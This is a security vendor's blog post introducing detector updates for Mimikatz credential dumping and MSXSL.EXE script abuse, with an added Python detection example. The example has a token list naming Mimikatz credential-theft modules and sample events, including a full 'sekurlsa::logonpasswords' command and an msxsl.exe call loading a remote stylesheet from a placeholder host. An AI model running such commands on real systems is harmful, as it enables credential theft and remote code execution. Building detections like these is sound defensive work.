We are often asked about the new adversary techniques we’re identifying and the research we are doing to hunt them down. We are excited to begin providing regular updates highlighting these improvements.
When Red Canary's security operations team or researchers identify behaviors, indicators, or attributes that can be used to describe a potentially threatening event, that knowledge is implemented as a Detector. A Detector may be very specific or very broad, and Detectors tend to evolve over time.
We will be publishing these updates every one to two weeks in the Detector Updates section. An example of these updates is below:
Identifies instances of Mimikatz based on command line elements common to Mimikatz execution.
ATT&CK Technique T1003
Identifies malicious use of MSXSL.EXE, a command line utility that performs Extensible Stylesheet Language (XSL) transformations using the Microsoft XSL processor. MSXSL.EXE can be abused to execute malicious scripts locally or remotely.
ATT&CK Technique T1127
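To make the two Detector descriptions above concrete, here is an added example of how such command-line based detections can be evaluated against process-creation telemetry. This is illustrative code written for this page, not Red Canary's Detector logic. It assumes a simplified process event (executable path plus full command line), a hand-picked list of Mimikatz module prefixes, and that MSXSL.EXE's `-o` and `-u` switches consume the following argument; the sample events are constructed, not real logs.

```python
"""Illustrative command-line detectors for the two Detector Updates above.

Added example, not Red Canary's detector code. Two behavioural rules are
evaluated over constructed process-creation events, returning the ATT&CK
technique IDs from the page for every rule that fires.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the executable as a process-creation log records it
    command_line: str   # full command line of the new process


# Assumption: command-line fragments common to Mimikatz module syntax. A production
# detector would carry a broader, tuned list; these are enough to show the technique.
MIMIKATZ_TOKENS = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::")


def detect_mimikatz(ev):
    """Detector 1 (ATT&CK T1003): match on Mimikatz module syntax in the arguments.

    Keying on the command line rather than the image name means the rule does not
    depend on the binary being called mimikatz.exe."""
    cl = ev.command_line.lower()
    return any(tok in cl for tok in MIMIKATZ_TOKENS)


REMOTE_ARG = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
OPTIONS_WITH_VALUE = {"-o", "-u"}   # assumption: msxsl.exe switches that take a following value


def _args(command_line):
    """Split a Windows command line on whitespace, honouring double quotes.
    Not a full CommandLineToArgvW implementation; sufficient for the samples here."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command_line)]


def _positional(args):
    """Drop switches and name=value stylesheet parameters, keeping source and stylesheet."""
    out, skip = [], False
    for a in args:
        if skip:
            skip = False
            continue
        if a.lower() in OPTIONS_WITH_VALUE:
            skip = True
            continue
        if a.startswith("-"):
            continue
        if "=" in a and not REMOTE_ARG.match(a):
            continue
        out.append(a)
    return out


def detect_msxsl_abuse(ev):
    """Detector 2 (ATT&CK T1127): msxsl.exe fed a remote resource, or a stylesheet
    argument that is not a .xsl/.xslt file, both atypical for a legitimate transform."""
    if ntpath.basename(ev.image).lower() != "msxsl.exe":
        return False
    positional = _positional(_args(ev.command_line)[1:])   # skip argv[0]
    if any(REMOTE_ARG.match(a) for a in positional[:2]):
        return True
    return len(positional) >= 2 and not positional[1].lower().endswith((".xsl", ".xslt"))


DETECTORS = [
    ("Mimikatz command line", "T1003", detect_mimikatz),
    ("MSXSL.EXE abuse", "T1127", detect_msxsl_abuse),
]


def evaluate(events):
    """Return (event index, detector name, ATT&CK technique) for every detector that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, technique, fn in DETECTORS:
            if fn(ev):
                hits.append((i, name, technique))
    return hits


# Constructed sample telemetry for demonstration; none of this is real log data.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent(r"C:\Users\alice\Downloads\mimikatz.exe",
                 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    ProcessEvent(r"C:\Tools\msxsl.exe", "msxsl.exe data.xml transform.xsl -o out.xml"),
    ProcessEvent(r"C:\Tools\msxsl.exe",
                 "msxsl.exe http://example.invalid/a.xml http://example.invalid/b.xsl"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\msxsl.exe", "msxsl.exe customers.xml notes.txt"),
]

if __name__ == "__main__":
    for idx, name, technique in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name} ({technique}) -> {SAMPLE_EVENTS[idx].command_line}")
```

Running the block reports events 1, 3 and 4; the benign svchost.exe event and the ordinary local transform in event 2 produce nothing. The MSXSL rule deliberately ignores the image path, so a copy executed from a user's Temp directory is judged on its arguments alone, which is the property that makes this kind of Detector broad rather than signature-bound.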